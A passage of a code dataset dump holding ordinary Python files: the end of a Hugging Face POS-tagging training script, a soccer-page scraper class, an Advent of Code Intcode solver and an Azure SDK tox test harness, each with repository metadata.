\"accuracy_score\": accuracy_score(true_labels, true_predictions),\n \"precision_micro\": mip,\n \"recall_micro\": mir,\n \"f1_micro\": mif,\n \"precision_macro\": map,\n \"recall_macro\": mar,\n \"f1_macro\": maf\n }\n for i, tag in enumerate(label_names):\n res.update({\n f'precision_{tag}': p[i],\n f'recall_{tag}': r[i],\n f'f1_{tag}': f[i]\n })\n return res\n\n # Initialize our Trainer\n trainer: Trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=tokenized_datasets[\"train\"]\n if training_args.do_train else None,\n eval_dataset=tokenized_datasets[\"validation\"]\n if training_args.do_eval else None,\n tokenizer=tokenizer,\n data_collator=data_collator,\n compute_metrics=compute_metrics,\n )\n\n # Training\n if training_args.do_train:\n model_path = (model_args.model_name_or_path if\n (model_args.model_name_or_path is not None\n and os.path.isdir(model_args.model_name_or_path)) else\n None)\n trainer.train(model_path=model_path)\n trainer.save_model() # Saves the tokenizer too for easy upload\n\n # Evaluation\n results = {}\n if training_args.do_eval:\n logger.info(\"*** Evaluate ***\")\n\n results = trainer.evaluate()\n\n output_eval_file = os.path.join(\n training_args.output_dir,\n f\"eval_results_{data_args.task_name}.txt\")\n if trainer.is_world_process_zero():\n with open(output_eval_file, \"w\") as writer:\n logger.info(\"***** Eval results *****\")\n for key, value in results.items():\n logger.info(f\" {key} = {value}\")\n writer.write(f\"{key} = {value}\\n\")\n\n # Predict\n if training_args.do_predict:\n logger.info(\"*** Predict ***\")\n\n test_dataset = tokenized_datasets[\"test\"]\n predictions, labels, metrics = trainer.predict(test_dataset)\n predictions = np.argmax(predictions, axis=2)\n\n # Remove ignored index (special tokens)\n true_predictions = [[\n id2label[p] for (p, lab) in zip(prediction, label) if lab != -100\n ] for prediction, label in zip(predictions, labels)]\n\n output_test_results_file = os.path.join(training_args.output_dir,\n \"test_results.txt\")\n if trainer.is_world_process_zero():\n with open(output_test_results_file, \"w\") as writer:\n for key, value in metrics.items():\n logger.info(f\" {key} = {value}\")\n writer.write(f\"{key} = {value}\\n\")\n\n # Save predictions\n output_test_predictions_file = os.path.join(training_args.output_dir,\n \"test_predictions.txt\")\n if trainer.is_world_process_zero():\n with open(output_test_predictions_file, \"w\") as writer:\n for prediction in true_predictions:\n writer.write(\" \".join(prediction) + \"\\n\")\n\n return results\n\n\ndef _mp_fn(index):\n # For xla_spawn (TPUs)\n main()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "wietsedv/low-resource-adapt", "sub_path": "src/train/train_pos.py", "file_name": "train_pos.py", "file_ext": "py", "file_size_in_byte": 18388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 43, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 49, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 55, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 62, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 72, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 72, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 75, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 75, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 81, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 81, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 87, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 87, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 92, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 92, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 99, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 99, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 106, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 109, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 109, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 115, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 124, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 66, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 153, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 159, "usage_type": "call"}, {"api_name": "json.load", "line_number": 161, "usage_type": "call"}, {"api_name": "json.load", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "transformers.HfArgumentParser", "line_number": 194, "usage_type": "call"}, {"api_name": "transformers.TrainingArguments", "line_number": 195, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 201, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 208, "usage_type": "call"}, {"api_name": "transformers.trainer_utils.is_main_process", "line_number": 212, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 211, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 212, "usage_type": "attribute"}, {"api_name": "transformers.trainer_utils.is_main_process", "line_number": 222, "usage_type": "call"}, {"api_name": "transformers.utils.logging.set_verbosity_info", "line_number": 223, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 223, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.enable_default_handler", "line_number": 224, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 224, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.enable_explicit_format", "line_number": 225, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 225, "usage_type": "attribute"}, {"api_name": "transformers.set_seed", "line_number": 229, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 242, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 253, "usage_type": "call"}, {"api_name": "utils.LABEL_SETS", "line_number": 266, "usage_type": "name"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 275, "usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 275, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 283, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 283, "usage_type": "name"}, {"api_name": "transformers.AutoModelForTokenClassification.from_pretrained", "line_number": 289, "usage_type": "call"}, {"api_name": "transformers.AutoModelForTokenClassification", "line_number": 289, "usage_type": "name"}, {"api_name": "transformers.PreTrainedTokenizerFast", "line_number": 312, "usage_type": "argument"}, {"api_name": "datasets.map", "line_number": 355, "usage_type": "call"}, {"api_name": "transformers.DataCollatorForTokenClassification", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 368, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_fscore_support", "line_number": 380, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_fscore_support", "line_number": 384, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_fscore_support", "line_number": 388, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 394, "usage_type": "call"}, {"api_name": "trainer.Trainer", "line_number": 411, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 427, "usage_type": "call"}, {"api_name": "os.path", "line_number": 427, "usage_type": "attribute"}, {"api_name": "trainer.train", "line_number": 429, "usage_type": "call"}, {"api_name": "trainer.save_model", "line_number": 430, "usage_type": "call"}, {"api_name": "trainer.evaluate", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 439, "usage_type": "attribute"}, {"api_name": "trainer.is_world_process_zero", "line_number": 442, "usage_type": "call"}, {"api_name": "trainer.predict", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 455, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "trainer.is_world_process_zero", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 471, "usage_type": "call"}, {"api_name": "os.path", "line_number": 471, "usage_type": "attribute"}, {"api_name": "trainer.is_world_process_zero", "line_number": 473, "usage_type": "call"}]}
+{"seq_id": "19999066690", "text": "from Soup import Soup\nfrom datetime import datetime, time, date\n\nclass MatchHeadingSoup(Soup):\n\n def __init__(self,soup):\n Soup.__init__(self, soup)\n\n def get_date_of_match(self):\n month_year = self.get_soup().find('span', class_='month').text.strip().split('/')\n hour_min = self.get_soup().find('span', class_='hour').text.strip().split(':')\n\n # Find date of the game\n day = int(self.get_soup().find('span', class_='day').text.strip())\n month = int(month_year[0])\n year = int(month_year[1])\n\n # Find hour of the game\n hour = int(hour_min[0])\n minute = int(hour_min[1])\n\n # Combine date and time together\n d = date(year, month, day)\n t = time(hour, minute)\n\n return datetime.combine(d, t)\n\n def get_match_detail_url(self):\n return self.get_soup().find('div', class_='season__game-action grid-16 grid-mt-12 grid-msw-48').a['href']\n", "repo_name": "StanislawAbyszkin/Soccer-Web-Scraper", "sub_path": "Scraper/SoupModels/SoupMatchHeading.py", "file_name": "SoupMatchHeading.py", "file_ext": "py", "file_size_in_byte": 944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "Soup.Soup", "line_number": 4, "usage_type": "name"}, {"api_name": "Soup.Soup.__init__", "line_number": 7, "usage_type": "call"}, {"api_name": "Soup.Soup", "line_number": 7, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "18132819923", "text": "#!/usr/bin/python\r\nimport sys\r\nimport itertools \r\n\r\ndef resetdata():\r\n ans = []\r\n prog = open('advent07.txt').readlines()\r\n for a in prog[0].split(\",\"):\r\n ans.append(int(a))\r\n return ans\r\n\r\ndef combos(mydata):\r\n listA = [0,1,2,3,4]\r\n perm = itertools.permutations(listA) \r\n maxthrust = 0\r\n maxthrustcombo = []\r\n\r\n for i in list(perm): \r\n # pass mydata, then an array of inputs from right to left (pop)\r\n # print(\"processed 0,{} ao={}\".format(i[0],ao)) \r\n ao = processa(mydata,[0,i[0]]) # A\r\n bo = processa(mydata,[ao,i[1]]) # B\r\n co = processa(mydata,[bo,i[2]]) # C\r\n do = processa(mydata,[co,i[3]]) # D\r\n eo = processa(mydata,[do,i[4]]) # E\r\n if eo > maxthrust:\r\n maxthrust = eo\r\n maxthrustcombo = i\r\n print (\"Max with {} is {}\".format(maxthrust,maxthrustcombo))\r\n\r\n\r\ndef processa(mydata,ins):\r\n\r\n lenmydata = len(mydata)\r\n i = 0\r\n while (i < lenmydata and mydata[i] != 99 ):\r\n # print(mydata)\r\n oc = mydata[i]%10\r\n if mydata[i] > 100 and int(mydata[i]/100)%10 == 1:\r\n p1 = 1 # immediate\r\n else:\r\n p1 = 0 # positional\r\n if mydata[i] > 1000:\r\n p2 = 1\r\n else:\r\n p2 = 0\r\n if (4 == oc):\r\n if p1:\r\n dout = mydata[i+1]\r\n else:\r\n dout = mydata[mydata[i+1]]\r\n #print(\"output: {}\".format(dout))\r\n return dout\r\n i += 2\r\n elif (3 == oc):\r\n mydata[mydata[i+1]] = ins.pop()\r\n i += 2\r\n else:\r\n a = mydata[i+1]\r\n b = mydata[i+2]\r\n p = mydata[i+3] # always positional\r\n #print (\"setof4 ocfull:{},a:{},b:{},p:{},|,p1:{},p2:{}\".format(mydata[i],a,b,p,p1,p2))\r\n # 000oo\r\n if p1:\r\n av = a\r\n else:\r\n av = mydata[a]\r\n if p2:\r\n bv = b\r\n else:\r\n bv = mydata[b]\r\n #print (\"av,bv={},{}\".format(av,bv))\r\n if (1 == oc):\r\n mydata[p] = av + bv\r\n i += 4\r\n elif (2 == oc):\r\n mydata[p] = av * bv\r\n i += 4\r\n elif (5 == oc):\r\n # Opcode 5 is jump-if-true: if the first parameter is non-zero, it sets the instruction pointer to the value from the second parameter.\r\n # Otherwise, it does nothing.\r\n if 0 != av:\r\n i = bv\r\n else:\r\n i += 3\r\n elif (6 == oc):\r\n # Opcode 6 is jump-if-false: if the first parameter is zero, it sets the instruction pointer to the value from the second parameter.\r\n # Otherwise, it does nothing.\r\n if 0 == av:\r\n i = bv\r\n else:\r\n i += 3\r\n elif (7 == oc):\r\n # Opcode 7 is less than: if the first parameter is less than the second parameter, it stores 1 in the position given by the third parameter.\r\n # Otherwise, it stores 0.\r\n if av < bv:\r\n mydata[p] = 1\r\n i += 4\r\n else:\r\n mydata[p] = 0\r\n i += 4\r\n elif (8 == oc):\r\n # Opcode 8 is equals: if the first parameter is equal to the second parameter, it stores 1 in the position given by the third parameter.\r\n # Otherwise, it stores 0.\r\n if av == bv:\r\n mydata[p] = 1\r\n i += 4\r\n else:\r\n mydata[p] = 0\r\n i += 4\r\n else:\r\n i += 1 \r\nif __name__ == \"__main__\":\r\n mydata = resetdata()\r\n #print (mydata)\r\n combos(mydata)\r\n", "repo_name": "allanpaschall/Advent2019", "sub_path": "2019/Bryan/day07a.py", "file_name": "day07a.py", "file_ext": "py", "file_size_in_byte": 3896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "itertools.permutations", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "43092391196", "text": "import sys\nimport os\nimport errno\nimport shutil\nimport re\nimport multiprocessing\nimport glob\n\nif sys.version_info < (3, 0):\n from Queue import Queue\nelse:\n from queue import Queue\nfrom threading import Thread\n\nfrom subprocess import Popen, PIPE, STDOUT\nfrom common_tasks import (\n process_glob_string,\n run_check_call,\n cleanup_folder,\n clean_coverage,\n log_file,\n read_file,\n is_error_code_5_allowed,\n create_code_coverage_params,\n find_whl,\n parse_setup\n)\n\nfrom pkg_resources import parse_requirements, RequirementParseError\nimport logging\n\nlogging.getLogger().setLevel(logging.INFO)\n\nroot_dir = os.path.abspath(os.path.join(os.path.abspath(__file__), \"..\", \"..\", \"..\"))\ncoverage_dir = os.path.join(root_dir, \"_coverage/\")\npool_size = multiprocessing.cpu_count() * 2\nDEFAULT_TOX_INI_LOCATION = os.path.join(root_dir, \"eng/tox/tox.ini\")\nIGNORED_TOX_INIS = [\"azure-cosmos\"]\ntest_tools_path = os.path.join(root_dir, \"eng\", \"test_tools.txt\")\ndependency_tools_path = os.path.join(root_dir, \"eng\", \"dependency_tools.txt\")\n\nclass ToxWorkItem:\n def __init__(self, target_package_path, tox_env, options_array):\n self.target_package_path = target_package_path\n self.tox_env = tox_env\n self.options_array = options_array\n\n\nclass Worker(Thread):\n def __init__(self, tasks):\n Thread.__init__(self)\n self.tasks = tasks\n self.daemon = True\n self.start()\n\n def run(self):\n while True:\n func, args, kargs = self.tasks.get()\n try:\n func(*args, **kargs)\n except Exception as e:\n logging.error(e)\n finally:\n self.tasks.task_done()\n\n\ndef in_ci():\n return os.getenv(\"TF_BUILD\", False)\n\n\nclass ThreadPool:\n def __init__(self, num_threads):\n self.tasks = Queue(num_threads)\n for _ in range(num_threads):\n Worker(self.tasks)\n\n def add_task(self, func, *args, **kargs):\n self.tasks.put((func, args, kargs))\n\n def map(self, func, args_list):\n for args in args_list:\n self.add_task(func, args)\n\n def wait_completion(self):\n self.tasks.join()\n\n\ndef combine_coverage_files(targeted_packages):\n # find tox.ini file. tox.ini is used to combine coverage paths to generate formatted report\n tox_ini_file = os.path.join(root_dir, \"eng\", \"tox\", \"tox.ini\")\n config_file_flag = \"--rcfile={}\".format(tox_ini_file)\n\n if os.path.isfile(tox_ini_file):\n # for every individual coverage file, run coverage combine to combine path\n for package_dir in [package for package in targeted_packages]:\n coverage_file = os.path.join(package_dir, \".coverage\")\n if os.path.isfile(coverage_file):\n cov_cmd_array = [sys.executable, \"-m\", \"coverage\", \"combine\"]\n # tox.ini file has coverage paths to combine\n # Pas tox.ini as coverage config file\n cov_cmd_array.extend([config_file_flag, coverage_file])\n run_check_call(cov_cmd_array, package_dir)\n else:\n # not a hard error at this point\n # this combine step is required only for modules if report has package name starts with .tox\n logging.error(\"tox.ini is not found in path {}\".format(root_dir))\n\n\ndef collect_tox_coverage_files(targeted_packages):\n root_coverage_dir = os.path.join(root_dir, \"_coverage/\")\n\n clean_coverage(coverage_dir)\n\n # coverage combine fixes this with the help of tox.ini[coverage:paths]\n coverage_files = []\n for package_dir in [package for package in targeted_packages]:\n coverage_file = os.path.join(package_dir, \".coverage\")\n if os.path.isfile(coverage_file):\n destination_file = os.path.join(\n root_coverage_dir, \".coverage_{}\".format(os.path.basename(package_dir))\n )\n shutil.copyfile(coverage_file, destination_file)\n coverage_files.append(destination_file)\n\n logging.info(\"Uploading .coverage files: {}\".format(coverage_files))\n\n\n\ndef individual_workload(tox_command_tuple, workload_results):\n pkg = os.path.basename(tox_command_tuple[1])\n stdout = os.path.join(tox_command_tuple[1], \"stdout.txt\")\n stderr = os.path.join(tox_command_tuple[1], \"stderr.txt\")\n tox_dir = os.path.join(tox_command_tuple[1], \"./.tox/\")\n\n with open(stdout, \"w\") as f_stdout, open(stderr, \"w\") as f_stderr:\n proc = Popen(\n tox_command_tuple[0],\n stdout=f_stdout,\n stderr=f_stderr,\n cwd=tox_command_tuple[1],\n env=os.environ.copy(),\n )\n\n logging.info(\"POpened task for for {}\".format(pkg))\n proc.wait()\n\n return_code = proc.returncode\n\n if proc.returncode != 0:\n logging.error(\"{} returned with code {}\".format(pkg, proc.returncode))\n else:\n logging.info(\n \"{} returned with code 0, output will be printed after the test run completes.\".format(\n pkg\n )\n )\n\n if read_file(stderr):\n logging.error(\"Package {} had stderror output. Logging.\".format(pkg))\n return_code = \"StdErr output detected\"\n\n workload_results[tox_command_tuple[1]] = (return_code, stdout, stderr)\n\n if in_ci():\n shutil.rmtree(tox_dir)\n\n\ndef execute_tox_parallel(tox_command_tuples):\n pool = ThreadPool(pool_size)\n workload_results = {}\n run_result = 0\n\n for index, cmd_tuple in enumerate(tox_command_tuples):\n pool.add_task(individual_workload, cmd_tuple, workload_results)\n\n pool.wait_completion()\n\n for key in workload_results.keys():\n log_file(workload_results[key][1])\n\n if workload_results[key][0] != 0:\n logging.error(\n \"{} tox invocation exited with returncode {}\".format(\n os.path.basename(key), workload_results[key][0]\n )\n )\n run_result = 1\n\n return run_result\n\n\ndef compare_req_to_injected_reqs(parsed_req, injected_packages):\n if parsed_req is None:\n return False\n\n return any(parsed_req.name in req for req in injected_packages)\n\n\ndef inject_custom_reqs(file, injected_packages, package_dir):\n req_lines = []\n injected_packages = [p for p in re.split(\"[\\s,]\", injected_packages) if p]\n\n if injected_packages:\n logging.info(\n \"Adding custom packages to requirements for {}\".format(package_dir)\n )\n with open(file, \"r\") as f:\n for line in f:\n try:\n parsed_req = [req for req in parse_requirements(line)]\n except RequirementParseError as e:\n parsed_req = [None]\n req_lines.append((line, parsed_req))\n\n if req_lines:\n all_adjustments = injected_packages + [\n line_tuple[0].strip()\n for line_tuple in req_lines\n if line_tuple[0].strip()\n and not compare_req_to_injected_reqs(\n line_tuple[1][0], injected_packages\n )\n ]\n else:\n all_adjustments = injected_packages\n\n with open(file, \"w\") as f:\n # note that we directly use '\\n' here instead of os.linesep due to how f.write() actually handles this stuff internally\n # If a file is opened in text mode (the default), during write python will accidentally double replace due to \"\\r\" being\n # replaced with \"\\r\\n\" on Windows. Result: \"\\r\\n\\n\". Extra line breaks!\n f.write(\"\\n\".join(all_adjustments))\n\n\ndef build_whl_for_req(req, package_path):\n if \"..\" in req:\n # Create temp path if it doesn't exist\n temp_dir = os.path.join(package_path, \".tmp_whl_dir\")\n if not os.path.exists(temp_dir):\n os.mkdir(temp_dir)\n\n req_pkg_path = os.path.abspath(os.path.join(package_path, req.replace(\"\\n\", \"\")))\n pkg_name, version, _, _ = parse_setup(req_pkg_path)\n logging.info(\"Building wheel for package {}\".format(pkg_name))\n run_check_call([sys.executable, \"setup.py\", \"bdist_wheel\", \"-d\", temp_dir], req_pkg_path)\n\n whl_path = os.path.join(temp_dir, find_whl(pkg_name, version, temp_dir))\n logging.info(\"Wheel for package {0} is {1}\".format(pkg_name, whl_path))\n logging.info(\"Replacing dev requirement. Old requirement:{0}, New requirement:{1}\".format(req, whl_path))\n return whl_path\n else:\n return req\n\ndef replace_dev_reqs(file, pkg_root):\n adjusted_req_lines = []\n\n with open(file, \"r\") as f:\n for line in f:\n args = [\n part.strip()\n for part in line.split()\n if part and not part.strip() == \"-e\"\n ]\n amended_line = \" \".join(args)\n adjusted_req_lines.append(amended_line)\n\n req_file_name = os.path.basename(file)\n logging.info(\"Old {0}:{1}\".format(req_file_name, adjusted_req_lines))\n\n adjusted_req_lines = list(map(lambda x: build_whl_for_req(x, pkg_root), adjusted_req_lines))\n logging.info(\"New {0}:{1}\".format(req_file_name, adjusted_req_lines))\n\n with open(file, \"w\") as f:\n # note that we directly use '\\n' here instead of os.linesep due to how f.write() actually handles this stuff internally\n # If a file is opened in text mode (the default), during write python will accidentally double replace due to \"\\r\" being\n # replaced with \"\\r\\n\" on Windows. Result: \"\\r\\n\\n\". Extra line breaks!\n f.write(\"\\n\".join(adjusted_req_lines))\n\n\ndef collect_log_files(working_dir):\n logging.info(\"Collecting log files from {}\".format(working_dir))\n package = working_dir.split('/')[-1]\n # collect all the log files into one place for publishing in case of tox failure\n\n log_directory = os.path.join(\n root_dir, \"_tox_logs\"\n )\n\n try:\n os.mkdir(log_directory)\n logging.info(\"Created log directory: {}\".format(log_directory))\n except OSError:\n logging.info(\"'{}' directory already exists\".format(log_directory))\n\n log_directory = os.path.join(\n log_directory, package\n )\n\n try:\n os.mkdir(log_directory)\n logging.info(\"Created log directory: {}\".format(log_directory))\n except OSError:\n logging.info(\"'{}' directory already exists\".format(log_directory))\n\n log_directory = os.path.join(\n log_directory, sys.version.split()[0]\n )\n\n try:\n os.mkdir(log_directory)\n logging.info(\"Created log directory: {}\".format(log_directory))\n except OSError:\n logging.info(\"'{}' directory already exists\".format(log_directory))\n\n for test_env in glob.glob(os.path.join(working_dir, \".tox\", \"*\")):\n env = os.path.split(test_env)[-1]\n logging.info(\"env: {}\".format(env))\n log_files = os.path.join(test_env, \"log\")\n\n if os.path.exists(log_files):\n logging.info(\"Copying log files from {} to {}\".format(log_files, log_directory))\n\n temp_dir = os.path.join(log_directory, env)\n logging.info(\"TEMP DIR: {}\".format(temp_dir))\n try:\n os.mkdir(temp_dir)\n logging.info(\"Created log directory: {}\".format(temp_dir))\n except OSError:\n logging.info(\"Could not create '{}' directory\".format(temp_dir))\n break\n\n for filename in os.listdir(log_files):\n if filename.endswith(\".log\"):\n logging.info(\"LOG FILE: {}\".format(filename))\n\n file_location = os.path.join(log_files, filename)\n shutil.move(\n file_location,\n os.path.join(temp_dir, filename)\n )\n logging.info(\"Moved file to {}\".format(os.path.join(temp_dir, filename)))\n else:\n logging.info(\"Could not find {} directory\".format(log_files))\n\n for f in glob.glob(os.path.join(root_dir, \"_tox_logs\", \"*\")):\n logging.info(\"Log file: {}\".format(f))\n\n\ndef execute_tox_serial(tox_command_tuples):\n return_code = 0\n\n for index, cmd_tuple in enumerate(tox_command_tuples):\n tox_dir = os.path.abspath(os.path.join(cmd_tuple[1], \"./.tox/\"))\n logging.info(\"tox_dir: {}\".format(tox_dir))\n\n logging.info(\n \"Running tox for {}. {} of {}.\".format(\n os.path.basename(cmd_tuple[1]), index + 1, len(tox_command_tuples)\n )\n )\n\n result = run_check_call(cmd_tuple[0], cmd_tuple[1], always_exit=False)\n\n if result is not None and result != 0:\n return_code = result\n\n if in_ci():\n collect_log_files(cmd_tuple[1])\n shutil.rmtree(tox_dir)\n\n return return_code\n\n\ndef prep_and_run_tox(targeted_packages, parsed_args, options_array=[]):\n if parsed_args.wheel_dir:\n os.environ[\"PREBUILT_WHEEL_DIR\"] = parsed_args.wheel_dir\n\n if parsed_args.mark_arg:\n options_array.extend([\"-m\", \"{}\".format(parsed_args.mark_arg)])\n\n tox_command_tuples = []\n\n for index, package_dir in enumerate(targeted_packages):\n destination_tox_ini = os.path.join(package_dir, \"tox.ini\")\n destination_dev_req = os.path.join(package_dir, \"dev_requirements.txt\")\n\n tox_execution_array = [sys.executable, \"-m\", \"tox\"]\n\n local_options_array = options_array[:]\n\n # Get code coverage params for current package\n package_name = os.path.basename(package_dir)\n coverage_commands = create_code_coverage_params(parsed_args, package_name)\n local_options_array.extend(coverage_commands)\n\n pkg_egg_info_name = \"{}.egg-info\".format(package_name.replace(\"-\", \"_\"))\n local_options_array.extend([\"--ignore\", pkg_egg_info_name])\n\n # if we are targeting only packages that are management plane, it is a possibility\n # that no tests running is an acceptable situation\n # we explicitly handle this here.\n if is_error_code_5_allowed(package_dir, package_name):\n local_options_array.append(\"--suppress-no-test-exit-code\")\n\n # if not present, re-use base\n if not os.path.exists(destination_tox_ini) or (\n os.path.exists(destination_tox_ini)\n and os.path.basename(package_dir) in IGNORED_TOX_INIS\n ):\n logging.info(\n \"No customized tox.ini present, using common eng/tox/tox.ini for {}\".format(\n os.path.basename(package_dir)\n )\n )\n tox_execution_array.extend([\"-c\", DEFAULT_TOX_INI_LOCATION])\n\n # handle empty file\n if not os.path.exists(destination_dev_req):\n logging.info(\"No dev_requirements present.\")\n with open(destination_dev_req, \"w+\") as file:\n file.write(\"\\n\")\n\n if in_ci():\n replace_dev_reqs(destination_dev_req, package_dir)\n replace_dev_reqs(test_tools_path, package_dir)\n replace_dev_reqs(dependency_tools_path, package_dir)\n os.environ[\"TOX_PARALLEL_NO_SPINNER\"] = \"1\"\n\n inject_custom_reqs(\n destination_dev_req, parsed_args.injected_packages, package_dir\n )\n\n if parsed_args.tox_env:\n tox_execution_array.extend([\"-e\", parsed_args.tox_env])\n\n if parsed_args.tenvparallel:\n tox_execution_array.extend([\"-p\", \"all\"])\n\n if local_options_array:\n tox_execution_array.extend([\"--\"] + local_options_array)\n\n tox_command_tuples.append((tox_execution_array, package_dir))\n\n if parsed_args.tparallel:\n return_code = execute_tox_parallel(tox_command_tuples)\n else:\n return_code = execute_tox_serial(tox_command_tuples)\n\n if not parsed_args.disablecov:\n collect_tox_coverage_files(targeted_packages)\n\n sys.exit(return_code)", "repo_name": "mirespace/python-azure", "sub_path": "scripts/devops_tasks/tox_harness.py", "file_name": "tox_harness.py", "file_ext": "py", "file_size_in_byte": 15912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.version_info", "line_number": 9, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 49, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 51, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 51, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 62, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 68, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 98, 